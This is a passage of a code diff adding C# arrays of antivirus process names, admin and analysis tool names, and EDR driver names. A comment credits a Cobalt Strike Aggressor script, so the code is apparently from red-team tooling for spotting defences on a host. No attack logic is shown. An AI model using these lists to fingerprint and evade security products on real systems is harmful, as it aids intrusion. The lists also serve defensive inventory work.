"PAVFNSVR.exe", "PAVSRV51.exe", "PNmSrv.exe", "POPROXY.EXE", "POProxy.exe", "PPClean.exe", + "PPCtlPriv.exe", "PQIBrowser.exe", "PSHost.exe", "PSIMSVC.EXE", "PXEMTFTP.exe", "PadFSvr.exe", "Pagent.exe", "Pagentwd.exe", "PavBckPT.exe", "PavFnSvr.exe", + "PavPrSrv.exe", "PavProt.exe", "PavReport.exe", "Pavkre.exe", "PcCtlCom.exe", "PcScnSrv.exe", "PccNTMon.exe", "PccNTUpd.exe", "PpPpWallRun.exe", "PrintDevice.exe", + "ProUtil.exe", "PsCtrlS.exe", "PsImSvc.exe", "PwdFiltHelp.exe", "Qoeloader.exe", "RAVMOND.exe", "RAVXP.exe", "RNReport.exe", "RPCServ.exe", "RSSensor.exe", + "RTVscan.exe", "RapApp.exe", "Rav.exe", "RavAlert.exe", "RavMon.exe", "RavMonD.exe", "RavService.exe", "RavStub.exe", "RavTask.exe", "RavTray.exe", "RavUpdate.exe", + "RavXP.exe", "RealMon.exe", "Realmon.exe", "RedirSvc.exe", "RegMech.exe", "ReporterSvc.exe", "RouterNT.exe", "Rtvscan.exe", "SAFeService.exe", "SAService.exe", + "SAVAdminService.exe", "SAVFMSESp.exe", "SAVMain.exe", "SAVScan.exe", "SCANMSG.exe", "SCANWSCS.exe", "SCFManager.exe", "SCFService.exe", "SCFTray.exe", + "SDTrayApp.exe", "SEVINST.EXE", "SMEX_ActiveUpdate.exe", "SMEX_Master.exe", "SMEX_RemoteConf.exe", "SMEX_SystemWatch.exe", "SMSECtrl.exe", "SMSELog.exe", + "SMSESJM.exe", "SMSESp.exe", "SMSESrv.exe", "SMSETask.exe", "SMSEUI.exe", "SNAC.EXE", "SNAC.exe", "SNDMon.exe", "SNDSrvc.exe", "SPBBCSvc.exe", "SPIDERML.EXE", + "SPIDERNT.EXE", "SSM.exe", "SSScheduler.exe", "SVCharge.exe", "SVDealer.exe", "SVFrame.exe", "SVTray.exe", "SWNETSUP.EXE", "SavRoam.exe", "SavService.exe", + "SavUI.exe", "ScanMailOutLook.exe", "SeAnalyzerTool.exe", "SemSvc.exe", "SescLU.exe", "SetupGUIMngr.exe", "SiteAdv.exe", "Smc.exe", "SmcGui.exe", "SnHwSrv.exe", + "SnICheckAdm.exe", "SnIcon.exe", "SnSrv.exe", "SnicheckSrv.exe", "SpIDerAgent.exe", "SpntSvc.exe", "SpyEmergency.exe", "SpyEmergencySrv.exe", "StOPP.exe", + "StWatchDog.exe", "SymCorpUI.exe", "SymSPort.exe", "TBMon.exe", "TFGui.exe", "TFService.exe", "TFTray.exe", "TFun.exe", "TIASPN~1.EXE", 
"TSAnSrf.exe", "TSAtiSy.exe", + "TScutyNT.exe", "TSmpNT.exe", "TmListen.exe", "TmPfw.exe", "Tmntsrv.exe", "Traflnsp.exe", "TrapTrackerMgr.exe", "UPSCHD.exe", "UcService.exe", "UdaterUI.exe", + "UmxAgent.exe", "UmxCfg.exe", "UmxFwHlp.exe", "UmxPol.exe", "Up2date.exe", "UpdaterUI.exe", "UrlLstCk.exe", "UserActivity.exe", "UserAnalysis.exe", "UsrPrmpt.exe", + "V3Medic.exe", "V3Svc.exe", "VPC32.exe", "VPDN_LU.exe", "VPTray.exe", "VSStat.exe", "VsStat.exe", "VsTskMgr.exe", "WEBPROXY.EXE", "WFXCTL32.EXE", "WFXMOD32.EXE", + "WFXSNT40.EXE", "WebProxy.exe", "WebScanX.exe", "WinRoute.exe", "WrSpySetup.exe", "ZLH.exe", "Zanda.exe", "ZhuDongFangYu.exe", "Zlh.exe", "_avp32.exe", "_avpcc.exe", + "_avpm.exe", "aAvgApi.exe", "aawservice.exe", "acaif.exe", "acctmgr.exe", "ackwin32.exe", "aclient.exe", "adaware.exe", "advxdwin.exe", "aexnsagent.exe", + "aexsvc.exe", "aexswdusr.exe", "aflogvw.exe", "afwServ.exe", "agentsvr.exe", "agentw.exe", "ahnrpt.exe", "ahnsd.exe", "ahnsdsv.exe", "alertsvc.exe", "alevir.exe", + "alogserv.exe", "alsvc.exe", "alunotify.exe", "aluschedulersvc.exe", "amon9x.exe", "amswmagt.exe", "anti-trojan.exe", "antiarp.exe", "antivirus.exe", "ants.exe", + "aphost.exe", "apimonitor.exe", "aplica32.exe", "aps.exe", "apvxdwin.exe", "arr.exe", "ashAvast.exe", "ashBug.exe", "ashChest.exe", "ashCmd.exe", "ashDisp.exe", + "ashEnhcd.exe", "ashLogV.exe", "ashMaiSv.exe", "ashPopWz.exe", "ashQuick.exe", "ashServ.exe", "ashSimp2.exe", "ashSimpl.exe", "ashSkPcc.exe", "ashSkPck.exe", + "ashUpd.exe", "ashWebSv.exe", "ashdisp.exe", "ashmaisv.exe", "ashserv.exe", "ashwebsv.exe", "asupport.exe", "aswDisp.exe", "aswRegSvr.exe", "aswServ.exe", + "aswUpdSv.exe", "aswUpdsv.exe", "aswWebSv.exe", "aswupdsv.exe", "atcon.exe", "atguard.exe", "atro55en.exe", "atupdater.exe", "atwatch.exe", "atwsctsk.exe", + "au.exe", "aupdate.exe", "aupdrun.exe", "aus.exe", "auto-protect.nav80try.exe", "autodown.exe", "autotrace.exe", "autoup.exe", "autoupdate.exe", "avEngine.exe", + "avadmin.exe", 
"avcenter.exe", "avconfig.exe", "avconsol.exe", "ave32.exe", "avengine.exe", "avesvc.exe", "avfwsvc.exe", "avgam.exe", "avgamsvr.exe", "avgas.exe", + "avgcc.exe", "avgcc32.exe", "avgcsrvx.exe", "avgctrl.exe", "avgdiag.exe", "avgemc.exe", "avgfws8.exe", "avgfws9.exe", "avgfwsrv.exe", "avginet.exe", "avgmsvr.exe", + "avgnsx.exe", "avgnt.exe", "avgregcl.exe", "avgrssvc.exe", "avgrsx.exe", "avgscanx.exe", "avgserv.exe", "avgserv9.exe", "avgsystx.exe", "avgtray.exe", "avguard.exe", + "avgui.exe", "avgupd.exe", "avgupdln.exe", "avgupsvc.exe", "avgvv.exe", "avgw.exe", "avgwb.exe", "avgwdsvc.exe", "avgwizfw.exe", "avkpop.exe", "avkserv.exe", + "avkservice.exe", "avkwctl9.exe", "avltmain.exe", "avmailc.exe", "avmcdlg.exe", "avnotify.exe", "avnt.exe", "avp.exe", "avp32.exe", "avpcc.exe", "avpdos32.exe", + "avpexec.exe", "avpm.exe", "avpncc.exe", "avps.exe", "avptc32.exe", "avpupd.exe", "avscan.exe", "avsched32.exe", "avserver.exe", "avshadow.exe", "avsynmgr.exe", + "avwebgrd.exe", "avwin.exe", "avwin95.exe", "avwinnt.exe", "avwupd.exe", "avwupd32.exe", "avwupsrv.exe", "avxmonitor9x.exe", "avxmonitornt.exe", "avxquar.exe", + "backweb.exe", "bargains.exe", "basfipm.exe", "bd_professional.exe", "bdagent.exe", "bdc.exe", "bdlite.exe", "bdmcon.exe", "bdss.exe", "bdsubmit.exe", "beagle.exe", + "belt.exe", "bidef.exe", "bidserver.exe", "bipcp.exe", "bipcpevalsetup.exe", "bisp.exe", "blackd.exe", "blackice.exe", "blink.exe", "blss.exe", "bmrt.exe", + "bootconf.exe", "bootwarn.exe", "borg2.exe", "bpc.exe", "bpk.exe", "brasil.exe", "bs120.exe", "bundle.exe", "bvt.exe", "bwgo0000.exe", "ca.exe", "caav.exe", + "caavcmdscan.exe", "caavguiscan.exe", "caf.exe", "cafw.exe", "caissdt.exe", "capfaem.exe", "capfasem.exe", "capfsem.exe", "capmuamagt.exe", "casc.exe", + "casecuritycenter.exe", "caunst.exe", "cavrep.exe", "cavrid.exe", "cavscan.exe", "cavtray.exe", "ccApp.exe", "ccEvtMgr.exe", "ccLgView.exe", "ccProxy.exe", + "ccSetMgr.exe", "ccSetmgr.exe", "ccSvcHst.exe", "ccap.exe", 
"ccapp.exe", "ccevtmgr.exe", "cclaw.exe", "ccnfagent.exe", "ccprovsp.exe", "ccproxy.exe", "ccpxysvc.exe", + "ccschedulersvc.exe", "ccsetmgr.exe", "ccsmagtd.exe", "ccsvchst.exe", "ccsystemreport.exe", "cctray.exe", "ccupdate.exe", "cdp.exe", "cfd.exe", "cfftplugin.exe", + "cfgwiz.exe", "cfiadmin.exe", "cfiaudit.exe", "cfinet.exe", "cfinet32.exe", "cfnotsrvd.exe", "cfp.exe", "cfpconfg.exe", "cfpconfig.exe", "cfplogvw.exe", + "cfpsbmit.exe", "cfpupdat.exe", "cfsmsmd.exe", "checkup.exe", "cka.exe", "clamscan.exe", "claw95.exe", "claw95cf.exe", "clean.exe", "cleaner.exe", "cleaner3.exe", + "cleanpc.exe", "cleanup.exe", "click.exe", "cmdagent.exe", "cmdinstall.exe", "cmesys.exe", "cmgrdian.exe", "cmon016.exe", "comHost.exe", "connectionmonitor.exe", + "control_panel.exe", "cpd.exe", "cpdclnt.exe", "cpf.exe", "cpf9x206.exe", "cpfnt206.exe", "crashrep.exe", "csacontrol.exe", "csinject.exe", "csinsm32.exe", + "csinsmnt.exe", "csrss_tc.exe", "ctrl.exe", "cv.exe", "cwnb181.exe", "cwntdwmo.exe", "cz.exe", "datemanager.exe", "dbserv.exe", "dbsrv9.exe", "dcomx.exe", + "defalert.exe", "defscangui.exe", "defwatch.exe", "deloeminfs.exe", "deputy.exe", "diskmon.exe", "divx.exe", "djsnetcn.exe", "dllcache.exe", "dllreg.exe", + "doors.exe", "doscan.exe", "dpf.exe", "dpfsetup.exe", "dpps2.exe", "drwagntd.exe", "drwatson.exe", "drweb.exe", "drweb32.exe", "drweb32w.exe", "drweb386.exe", + "drwebcgp.exe", "drwebcom.exe", "drwebdc.exe", "drwebmng.exe", "drwebscd.exe", "drwebupw.exe", "drwebwcl.exe", "drwebwin.exe", "drwupgrade.exe", "dsmain.exe", + "dssagent.exe", "dvp95.exe", "dvp95_0.exe", "dwengine.exe", "dwhwizrd.exe", "dwwin.exe", "ecengine.exe", "edisk.exe", "efpeadm.exe", "egui.exe", "ekrn.exe", + "elogsvc.exe", "emet_agent.exe", "emet_service.exe", "emsw.exe", "engineserver.exe", "ent.exe", "era.exe", "esafe.exe", "escanhnt.exe", "escanv95.exe", + "esecagntservice.exe", "esecservice.exe", "esmagent.exe", "espwatch.exe", "etagent.exe", "ethereal.exe", "etrustcipe.exe", "evpn.exe", 
"evtProcessEcFile.exe", + "evtarmgr.exe", "evtmgr.exe", "exantivirus-cnet.exe", "exe.avxw.exe", "execstat.exe", "expert.exe", "explore.exe", "f-agnt95.exe", "f-prot.exe", "f-prot95.exe", + "f-stopw.exe", "fameh32.exe", "fast.exe", "fch32.exe", "fih32.exe", "findviru.exe", "firesvc.exe", "firetray.exe", "firewall.exe", "fmon.exe", "fnrb32.exe", + "fortifw.exe", "fp-win.exe", "fp-win_trial.exe", "fprot.exe", "frameworkservice.exe", "frminst.exe", "frw.exe", "fsaa.exe", "fsaua.exe", "fsav.exe", "fsav32.exe", + "fsav530stbyb.exe", "fsav530wtbyb.exe", "fsav95.exe", "fsavgui.exe", "fscuif.exe", "fsdfwd.exe", "fsgk32.exe", "fsgk32st.exe", "fsguidll.exe", "fsguiexe.exe", + "fshdll32.exe", "fsm32.exe", "fsma32.exe", "fsmb32.exe", "fsorsp.exe", "fspc.exe", "fspex.exe", "fsqh.exe", "fssm32.exe", "fwinst.exe", "gator.exe", "gbmenu.exe", + "gbpoll.exe", "gcascleaner.exe", "gcasdtserv.exe", "gcasinstallhelper.exe", "gcasnotice.exe", "gcasserv.exe", "gcasservalert.exe", "gcasswupdater.exe", + "generics.exe", "gfireporterservice.exe", "ghost_2.exe", "ghosttray.exe", "giantantispywaremain.exe", "giantantispywareupdater.exe", "gmt.exe", "guard.exe", + "guarddog.exe", "guardgui.exe", "hacktracersetup.exe", "hbinst.exe", "hbsrv.exe", "hipsvc.exe", "hotactio.exe", "hotpatch.exe", "htlog.exe", "htpatch.exe", + "hwpe.exe", "hxdl.exe", "hxiul.exe", "iamapp.exe", "iamserv.exe", "iamstats.exe", "ibmasn.exe", "ibmavsp.exe", "icepack.exe", "icload95.exe", "icloadnt.exe", + "icmon.exe", "icsupp95.exe", "icsuppnt.exe", "idle.exe", "iedll.exe", "iedriver.exe", "iface.exe", "ifw2000.exe", "igateway.exe", "inetlnfo.exe", "infus.exe", + "infwin.exe", "inicio.exe", "init.exe", "inonmsrv.exe", "inorpc.exe", "inort.exe", "inotask.exe", "intdel.exe", "intren.exe", "iomon98.exe", "isPwdSvc.exe", + "isUAC.exe", "isafe.exe", "isafinst.exe", "issvc.exe", "istsvc.exe", "jammer.exe", "jdbgmrg.exe", "jedi.exe", "kaccore.exe", "kansgui.exe", "kansvr.exe", + "kastray.exe", "kav.exe", "kav32.exe", "kavfs.exe", 
"kavfsgt.exe", "kavfsrcn.exe", "kavfsscs.exe", "kavfswp.exe", "kavisarv.exe", "kavlite40eng.exe",
+ "kavlotsingleton.exe", "kavmm.exe", "kavpers40eng.exe", "kavpf.exe", "kavshell.exe", "kavss.exe", "kavstart.exe", "kavsvc.exe", "kavtray.exe", "kazza.exe",
+ "keenvalue.exe", "kerio-pf-213-en-win.exe", "kerio-wrl-421-en-win.exe", "kerio-wrp-421-en-win.exe", "kernel32.exe", "killprocesssetup161.exe", "kis.exe",
+ "kislive.exe", "kissvc.exe", "klnacserver.exe", "klnagent.exe", "klserver.exe", "klswd.exe", "klwtblfs.exe", "kmailmon.exe", "knownsvr.exe", "kpf4gui.exe",
+ "kpf4ss.exe", "kpfw32.exe", "kpfwsvc.exe", "krbcc32s.exe", "kvdetech.exe", "kvolself.exe", "kvsrvxp.exe", "kvsrvxp_1.exe", "kwatch.exe", "kwsprod.exe",
+ "kxeserv.exe", "launcher.exe", "ldnetmon.exe", "ldpro.exe", "ldpromenu.exe", "ldscan.exe", "leventmgr.exe", "livesrv.exe", "lmon.exe", "lnetinfo.exe",
+ "loader.exe", "localnet.exe", "lockdown.exe", "lockdown2000.exe", "log_qtine.exe", "lookout.exe", "lordpe.exe", "lsetup.exe", "luall.exe", "luau.exe",
+ "lucallbackproxy.exe", "lucoms.exe", "lucomserver.exe", "lucoms~1.exe", "luinit.exe", "luspt.exe", "makereport.exe", "mantispm.exe", "mapisvc32.exe",
+ "masalert.exe", "massrv.exe", "mcafeefire.exe", "mcagent.exe", "mcappins.exe", "mcconsol.exe", "mcdash.exe", "mcdetect.exe", "mcepoc.exe", "mcepocfg.exe",
+ "mcinfo.exe", "mcmnhdlr.exe", "mcmscsvc.exe", "mcods.exe", "mcpalmcfg.exe", "mcpromgr.exe", "mcregwiz.exe", "mcscript.exe", "mcscript_inuse.exe", "mcshell.exe",
+ "mcshield.exe", "mcshld9x.exe", "mcsysmon.exe", "mctool.exe", "mctray.exe", "mctskshd.exe", "mcuimgr.exe", "mcupdate.exe", "mcupdmgr.exe", "mcvsftsn.exe",
+ "mcvsrte.exe", "mcvsshld.exe", "mcwce.exe", "mcwcecfg.exe", "md.exe", "mfeann.exe", "mfevtps.exe", "mfin32.exe", "mfw2en.exe", "mfweng3.02d30.exe",
+ "mgavrtcl.exe", "mgavrte.exe", "mghtml.exe", "mgui.exe", "minilog.exe", "mmod.exe", "monitor.exe", "monsvcnt.exe", "monsysnt.exe", "moolive.exe",
+ "mostat.exe", "mpcmdrun.exe", "mpf.exe", "mpfagent.exe", "mpfconsole.exe", "mpfservice.exe", "mpftray.exe", "mps.exe", "mpsevh.exe", "mpsvc.exe", "mrf.exe",
+ "mrflux.exe", "msapp.exe", "msascui.exe", "msbb.exe", "msblast.exe", "mscache.exe", "msccn32.exe", "mscifapp.exe", "mscman.exe", "msconfig.exe", "msdm.exe",
+ "msdos.exe", "msiexec16.exe", "mskagent.exe", "mskdetct.exe", "msksrver.exe", "msksrvr.exe", "mslaugh.exe", "msmgt.exe", "msmpeng.exe", "msmsgri32.exe",
+ "msscli.exe", "msseces.exe", "mssmmc32.exe", "msssrv.exe", "mssys.exe", "msvxd.exe", "mu0311ad.exe", "mwatch.exe", "myagttry.exe", "n32scanw.exe", "nSMDemf.exe",
+ "nSMDmon.exe", "nSMDreal.exe", "nSMDsch.exe", "naPrdMgr.exe", "nav.exe", "navap.navapsvc.exe", "navapsvc.exe", "navapw32.exe", "navdx.exe", "navlu32.exe",
+ "navnt.exe", "navstub.exe", "navw32.exe", "navwnt.exe", "nc2000.exe", "ncinst4.exe", "MSASCuiL.exe", "MBAMService.exe", "mbamtray.exe", "CylanceSvc.exe",
+ "ndd32.exe", "ndetect.exe", "neomonitor.exe", "neotrace.exe", "neowatchlog.exe", "netalertclient.exe",
+ "netarmor.exe", "netcfg.exe", "netd32.exe", "netinfo.exe", "netmon.exe", "netscanpro.exe", "netspyhunter-1.2.exe", "netstat.exe", "netutils.exe", "networx.exe",
+ "ngctw32.exe", "ngserver.exe", "nip.exe", "nipsvc.exe", "nisoptui.exe", "nisserv.exe", "nisum.exe", "njeeves.exe", "nlsvc.exe", "nmain.exe", "nod32.exe",
+ "nod32krn.exe", "nod32kui.exe", "normist.exe", "norton_internet_secu_3.0_407.exe", "notstart.exe", "npf40_tw_98_nt_me_2k.exe", "npfmessenger.exe",
+ "npfmntor.exe", "npfmsg.exe", "nprotect.exe", "npscheck.exe", "npssvc.exe", "nrmenctb.exe", "nsched32.exe", "nscsrvce.exe", "nsctop.exe", "nsmdtr.exe",
+ "nssys32.exe", "nstask32.exe", "nsupdate.exe", "nt.exe", "ntcaagent.exe", "ntcadaemon.exe", "ntcaservice.exe", "ntrtscan.exe", "ntvdm.exe", "ntxconfig.exe",
+ "nui.exe", "nupgrade.exe", "nvarch16.exe", "nvc95.exe", "nvcoas.exe", "nvcsched.exe", "nvsvc32.exe", "nwinst4.exe", "nwservice.exe", "nwtool16.exe", "nymse.exe",
+ "oasclnt.exe", "oespamtest.exe", "ofcdog.exe", "ofcpfwsvc.exe", "okclient.exe", "olfsnt40.exe", "ollydbg.exe", "onsrvr.exe", "op_viewer.exe", "opscan.exe",
+ "optimize.exe", "ostronet.exe", "otfix.exe", "outpost.exe", "outpostinstall.exe", "outpostproinstall.exe", "paamsrv.exe", "padmin.exe", "pagent.exe",
+ "pagentwd.exe", "panixk.exe", "patch.exe", "pavbckpt.exe", "pavcl.exe", "pavfires.exe", "pavfnsvr.exe", "pavjobs.exe", "pavkre.exe", "pavmail.exe",
+ "pavprot.exe", "pavproxy.exe", "pavprsrv.exe", "pavsched.exe", "pavsrv50.exe", "pavsrv51.exe", "pavsrv52.exe", "pavupg.exe", "pavw.exe", "pccNT.exe",
+ "pccclient.exe", "pccguide.exe", "pcclient.exe", "pccnt.exe", "pccntmon.exe", "pccntupd.exe", "pccpfw.exe", "pcctlcom.exe", "pccwin98.exe", "pcfwallicon.exe",
+ "pcip10117_0.exe", "pcscan.exe", "pctsAuxs.exe", "pctsGui.exe", "pctsSvc.exe", "pctsTray.exe", "pdsetup.exe", "pep.exe", "periscope.exe", "persfw.exe",
+ "perswf.exe", "pf2.exe", "pfwadmin.exe", "pgmonitr.exe", "pingscan.exe", "platin.exe", "pmon.exe", "pnmsrv.exe", "pntiomon.exe", "pop3pack.exe", "pop3trap.exe",
+ "poproxy.exe", "popscan.exe", "portdetective.exe", "portmonitor.exe", "powerscan.exe", "ppinupdt.exe", "ppmcativedetection.exe", "pptbc.exe", "ppvstop.exe",
+ "pqibrowser.exe", "pqv2isvc.exe", "prevsrv.exe", "prizesurfer.exe", "prmt.exe", "prmvr.exe", "programauditor.exe", "proport.exe", "protectx.exe", "psctris.exe",
+ "psh_svc.exe", "psimreal.exe", "psimsvc.exe", "pskmssvc.exe", "pspf.exe", "purge.exe", "pview.exe", "pviewer.exe", "pxemtftp.exe", "pxeservice.exe",
+ "qclean.exe", "qconsole.exe", "qdcsfs.exe", "qoeloader.exe", "qserver.exe", "rapapp.exe", "rapuisvc.exe", "ras.exe", "rasupd.exe", "rav7.exe", "rav7win.exe",
+ "rav8win32eng.exe", "ravmon.exe", "ravmond.exe", "ravstub.exe", "ravxp.exe", "ray.exe", "rb32.exe", "rcsvcmon.exe", "rcsync.exe", "realmon.exe", "reged.exe",
+ "remupd.exe", "reportsvc.exe", "rescue.exe", "rescue32.exe", "rfwmain.exe", "rfwproxy.exe", "rfwsrv.exe", "rfwstub.exe", "rnav.exe", "rrguard.exe", "rshell.exe",
+ "rsnetsvr.exe", "rstray.exe", "rtvscan.exe", "rtvscn95.exe", "rulaunch.exe", "saHookMain.exe", "safeboxtray.exe", "safeweb.exe", "sahagent.exescan32.exe",
+ "sav32cli.exe", "save.exe", "savenow.exe", "savroam.exe", "savscan.exe", "savservice.exe", "sbserv.exe", "scam32.exe", "scan32.exe", "scan95.exe", "scanexplicit.exe",
+ "scanfrm.exe", "scanmailoutlook.exe", "scanpm.exe", "schdsrvc.exe", "schupd.exe", "scrscan.exe", "seestat.exe", "serv95.exe", "setloadorder.exe",
+ "setup_flowprotector_us.exe", "setupguimngr.exe", "setupvameeval.exe", "sfc.exe", "sgssfw32.exe", "sh.exe", "shellspyinstall.exe", "shn.exe", "showbehind.exe",
+ "shstat.exe", "siteadv.exe", "smOutlookPack.exe", "smc.exe", "smoutlookpack.exe", "sms.exe", "smsesp.exe", "smss32.exe", "sndmon.exe", "sndsrvc.exe",
+ "soap.exe", "sofi.exe", "softManager.exe", "spbbcsvc.exe", "spf.exe", "sphinx.exe", "spideragent.exe", "spiderml.exe", "spidernt.exe", "spiderui.exe",
+ "spntsvc.exe", "spoler.exe", "spoolcv.exe", "spoolsv32.exe", "spyxx.exe", "srexe.exe", "srng.exe", "srvload.exe", "srvmon.exe", "ss3edit.exe", "sschk.exe",
+ "ssg_4104.exe", "ssgrate.exe", "st2.exe", "stcloader.exe", "stinger.exe", "stopp.exe", "stwatchdog.exe", "supftrl.exe", "support.exe", "supporter5.exe",
+ "svcGenericHost", "svcharge.exe", "svchostc.exe", "svchosts.exe", "svcntaux.exe", "svdealer.exe", "svframe.exe", "svtray.exe", "swdsvc.exe", "sweep95.exe",
+ "sweepnet.sweepsrv.sys.swnetsup.exe", "sweepsrv.exe", "swnetsup.exe", "swnxt.exe", "swserver.exe", "symlcsvc.exe", "symproxysvc.exe", "symsport.exe", "symtray.exe",
+ "symwsc.exe", "sysdoc32.exe", "sysedit.exe", "sysupd.exe", "taskmo.exe", "taumon.exe", "tbmon.exe", "tbscan.exe", "tc.exe", "tca.exe", "tclproc.exe", "tcm.exe",
+ "tdimon.exe", "tds-3.exe", "tds2-98.exe", "tds2-nt.exe", "teekids.exe", "tfak.exe", "tfak5.exe", "tgbob.exe", "titanin.exe", "titaninxp.exe", "tmas.exe",
+ "tmlisten.exe", "tmntsrv.exe", "tmpfw.exe", "tmproxy.exe", "tnbutil.exe", "tpsrv.exe", "tracesweeper.exe", "trickler.exe", "trjscan.exe", "trjsetup.exe",
+ "trojantrap3.exe", "trupd.exe", "tsadbot.exe", "tvmd.exe", "tvtmd.exe", "udaterui.exe", "undoboot.exe", "unvet32.exe", "updat.exe", "updtnv28.exe", "upfile.exe",
+ "upgrad.exe", "uplive.exe", "urllstck.exe", "usergate.exe", "usrprmpt.exe", "utpost.exe", "v2iconsole.exe", "v3clnsrv.exe", "v3exec.exe", "v3imscn.exe",
+ "vbcmserv.exe", "vbcons.exe", "vbust.exe", "vbwin9x.exe", "vbwinntw.exe", "vcsetup.exe", "vet32.exe", "vet95.exe", "vetmsg.exe", "vettray.exe", "vfsetup.exe",
+ "vir-help.exe", "virusmdpersonalfirewall.exe", "vnlan300.exe", "vnpc3000.exe", "vpatch.exe", "vpc32.exe", "vpc42.exe", "vpfw30s.exe", "vprosvc.exe",
+ "vptray.exe", "vrv.exe", "vrvmail.exe", "vrvmon.exe", "vrvnet.exe", "vscan40.exe", "vscenu6.02d30.exe", "vsched.exe", "vsecomr.exe", "vshwin32.exe", "vsisetup.exe",
+ "vsmain.exe", "vsmon.exe", "vsserv.exe", "vsstat.exe", "vstskmgr.exe", "vswin9xe.exe", "vswinntse.exe", "vswinperse.exe", "w32dsm89.exe", "w9x.exe",
+ "watchdog.exe", "webdav.exe", "webproxy.exe", "webscanx.exe", "webtrap.exe", "webtrapnt.exe", "wfindv32.exe", "wfxctl32.exe", "wfxmod32.exe", "wfxsnt40.exe",
+ "whoswatchingme.exe", "wimmun32.exe", "win-bugsfix.exe", "winactive.exe", "winmain.exe", "winnet.exe", "winppr32.exe", "winrecon.exe", "winroute.exe", "winservn.exe",
+ "winssk32.exe", "winstart.exe", "winstart001.exe", "wintsk32.exe", "winupdate.exe", "wkufind.exe", "wnad.exe", "wnt.exe", "wradmin.exe", "wrctrl.exe",
+ "wsbgate.exe", "wssfcmai.exe", "wupdater.exe", "wupdt.exe", "wyvernworksfirewall.exe", "xagt.exe", "xagtnotif.exe", "xcommsvr.exe", "xfilter.exe", "xpf202en.exe",
+ "zanda.exe", "zapro.exe", "zapsetup3001.exe", "zatutor.exe", "zhudongfangyu.exe", "zlclient.exe", "zlh.exe", "zonalm2601.exe", "zonealarm.exe", "cb.exe",
+ "MsMpEng.exe", "MsSense.exe", "CSFalconService.exe", "CSFalconContainer.exe", "redcloak.exe", "OmniAgent.exe","CrAmTray.exe","AmSvc.exe","minionhost.exe",
+ "PylumLoader.exe","CrsSvc.exe"};
+
+ public static readonly string[] Admin = { "MobaXterm.exe", "bash.exe", "git-bash.exe", "mmc.exe", "Code.exe", "notepad++.exe", "notepad.exe", "cmd.exe",
+ "drwatson.exe", "DRWTSN32.EXE", "drwtsn32.exe", "dumpcap.exe", "ethereal.exe", "filemon.exe", "idag.exe", "idaw.exe", "k1205.exe", "loader32.exe",
+ "netmon.exe", "netstat.exe", "netxray.exe", "NmWebService.exe", "nukenabber.exe", "portmon.exe", "powershell.exe", "PRTG Traffic Gr.exe",
+ "PRTG Traffic Grapher.exe", "prtgwatchdog.exe", "putty.exe", "regmon.exe", "SystemEye.exe", "taskman.exe", "TASKMGR.EXE", "tcpview.exe", "Totalcmd.exe",
+ "TrafMonitor.exe", "windbg.exe", "winobj.exe", "wireshark.exe", "WMonAvNScan.exe", "WMonAvScan.exe", "WMonSrv.exe","regedit.exe", "regedit32.exe",
+ "accesschk.exe", "accesschk64.exe", "AccessEnum.exe", "ADExplorer.exe", "ADInsight.exe", "adrestore.exe", "Autologon.exe", "Autoruns.exe", "Autoruns64.exe",
+ "autorunsc.exe", "autorunsc64.exe", "Bginfo.exe", "Bginfo64.exe", "Cacheset.exe", "Clockres.exe", "Clockres64.exe", "Contig.exe", "Contig64.exe",
+ "Coreinfo.exe", "ctrl2cap.exe", "Dbgview.exe", "Desktops.exe", "disk2vhd.exe", "diskext.exe", "diskext64.exe", "Diskmon.exe", "DiskView.exe", "du.exe",
+ "du64.exe", "efsdump.exe", "FindLinks.exe", "FindLinks64.exe", "handle.exe", "handle64.exe", "hex2dec.exe", "hex2dec64.exe", "junction.exe", "junction64.exe",
+ "ldmdump.exe", "Listdlls.exe", "Listdlls64.exe", "livekd.exe", "livekd64.exe", "LoadOrd.exe", "LoadOrd64.exe", "LoadOrdC.exe", "LoadOrdC64.exe",
+ "logonsessions.exe", "logonsessions64.exe", "movefile.exe", "movefile64.exe", "notmyfault.exe", "notmyfault64.exe", "notmyfaultc.exe", "notmyfaultc64.exe",
+ "ntfsinfo.exe", "ntfsinfo64.exe", "pagedfrg.exe", "pendmoves.exe", "pendmoves64.exe", "pipelist.exe", "pipelist64.exe", "portmon.exe", "procdump.exe",
+ "procdump64.exe", "procexp.exe", "procexp64.exe", "Procmon.exe", "PsExec.exe", "PsExec64.exe", "psfile.exe", "psfile64.exe", "PsGetsid.exe", "PsGetsid64.exe",
+ "PsInfo.exe", "PsInfo64.exe", "pskill.exe", "pskill64.exe", "pslist.exe", "pslist64.exe", "PsLoggedon.exe", "PsLoggedon64.exe", "psloglist.exe", "pspasswd.exe",
+ "pspasswd64.exe", "psping.exe", "psping64.exe", "PsService.exe", "PsService64.exe", "psshutdown.exe", "pssuspend.exe", "pssuspend64.exe", "RAMMap.exe",
+ "RegDelNull.exe", "RegDelNull64.exe", "regjump.exe", "ru.exe", "ru64.exe", "sdelete.exe", "sdelete64.exe", "ShareEnum.exe", "ShellRunas.exe", "sigcheck.exe",
+ "sigcheck64.exe", "streams.exe", "streams64.exe", "strings.exe", "strings64.exe", "sync.exe", "sync64.exe", "Sysmon.exe", "Sysmon64.exe", "Tcpvcon.exe",
+ "Tcpview.exe", "Testlimit.exe", "Testlimit64.exe", "vmmap.exe", "Volumeid.exe", "Volumeid64.exe", "whois.exe", "whois64.exe", "Winobj.exe", "ZoomIt.exe",
+ "KeePass.exe", "1Password.exe", "lastpass.exe"};
+
+ // Thanks Harley!
+ // https://github.com/harleyQu1nn/AggressorScripts/blob/master/EDR.cna
+ public static readonly string[] Edr = {"CiscoAMPCEFWDriver.sys", "CiscoAMPHeurDriver.sys", "cbstream.sys", "cbk7.sys", "Parity.sys", "libwamf.sys",
+ "LRAgentMF.sys", "BrCow_x_x_x_x.sys", "brfilter.sys", "BDSandBox.sys", "TRUFOS.SYS", "AVC3.SYS", "Atc.sys", "AVCKF.SYS", "bddevflt.sys", "gzflt.sys",
+ "bdsvm.sys", "hbflt.sys", "cve.sys", "psepfilter.sys", "cposfw.sys", "dsfa.sys", "medlpflt.sys", "epregflt.sys", "TmFileEncDmk.sys", "tmevtmgr.sys",
+ "TmEsFlt.sys", "fileflt.sys", "SakMFile.sys", "SakFile.sys", "AcDriver.sys", "TMUMH.sys", "hfileflt.sys", "TMUMS.sys", "MfeEEFF.sys", "mfprom.sys",
+ "hdlpflt.sys", "swin.sys", "mfehidk.sys", "mfencoas.sys", "epdrv.sys", "carbonblackk.sys", "csacentr.sys", "csaenh.sys", "csareg.sys", "csascr.sys",
